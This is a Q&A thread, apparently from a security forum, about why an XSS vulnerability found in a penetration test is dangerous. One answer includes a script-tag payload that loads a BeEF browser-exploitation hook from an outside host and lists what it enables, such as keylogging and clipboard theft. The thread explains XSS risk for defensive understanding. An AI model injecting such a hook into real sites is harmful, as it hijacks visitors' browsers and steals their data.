I'm trying to understand why this might be problematic. I will, of course, ask the security company, but I'm also trying to evaluate them and see what the community has to say before they give me some roundabout answer.

A question: did they test the same site - and version - as the one you were browsing to? Not only did their exploit not show up - the versions of everything are different. PHP v5.3.2 vs. 5.3.1, everything else too... And the OS is not even the same!
– AviD♦ Dec 25 '10 at 23:05

Hi @AviD - good observation, they put up their own test site, which is different from what I used.
– siliconpi Dec 28 '10 at 8:10

Well duh, that seems kinda pointless, doncha think? Of course the results are gonna be different, that's why you don't see the exploit when you tried it on your system. I would go so far as to say the PT they did is nearly worthless... Clueless at best, negligent at worst.
– AviD♦ Dec 28 '10 at 9:00

2 Answers

For example, if I inject the following bit of XSS into your code, all clients viewing this code with JavaScript enabled would become zombies in my BeEF framework (Browser Exploitation Framework):

<script src='http://10.0.0.100/beef/hook/beefmagic.js.php'></script>

Once anyone browses a page with that script included in it, the framework automatically lets me know and basically lets me very easily choose from a toolbox of nasty stuff. To name some, all of which can be set to autorun when a new zombie registers:

Browser exploitation modules (even integrated with Metasploit)

Metasploit autopwn (yep, one click, one pwn)

Port scanning the LAN

Tor detection

Keylogging

See-what-the-user-sees functionality

Visited-pages brute forcing

Clipboard theft

Plugin detection

XSS can indeed be very dangerous!

UPDATE: In your specific situation it looks to me like you're looking at a non-persistent XSS vulnerability. This means that in order for this exploit to affect other users, the attackers would have to distribute the URL to unsuspecting victims for them to load it. This is however not an uncommon sight.

This is a classic XSS vulnerability. The danger here is that an outside attacker could inject random code into the page. If this page displays in an elevated privilege context, it is essentially equal to the attacker having control over the user's browser when accessing this page, thus the attacker will be able to perform any action that the user is able to perform. For example, if it's an e-commerce site, the attacker would be able to simulate the user buying something, even if the user did not intend to buy anything. You can imagine how bad it can be.

Since there are many ways to direct somebody to load a certain URL - both open ("click this link to get tons of free stuff!") and covert (hidden frames, etc.) - having such a thing on the site is very dangerous.